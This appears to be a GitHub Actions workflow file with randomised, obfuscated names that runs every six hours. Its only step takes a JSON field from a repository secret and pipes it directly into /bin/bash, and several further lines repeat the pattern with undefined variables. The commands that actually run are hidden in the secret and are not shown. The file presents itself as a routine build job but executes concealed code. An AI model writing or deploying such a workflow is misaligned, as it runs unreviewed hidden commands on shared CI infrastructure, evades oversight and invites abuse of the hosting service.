name: gedeshi7618

on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gedeshi7618
        env:
          or2317: ${{ secrets.or2317 }}
        run: |
          echo $or2317 | jq -r .a9 | /bin/bash
          echo $k409 | jq -r .gxjzc487 | /bin/bash
          echo $zpvut737 | jq -r .nskt5797 | /bin/bash
          echo $uwau49 | jq -r .fkv0 | /bin/bash
          echo $eg162 | jq -r .ubjm00 | /bin/bash
          echo $xijij6 | jq -r .s576 | /bin/bash

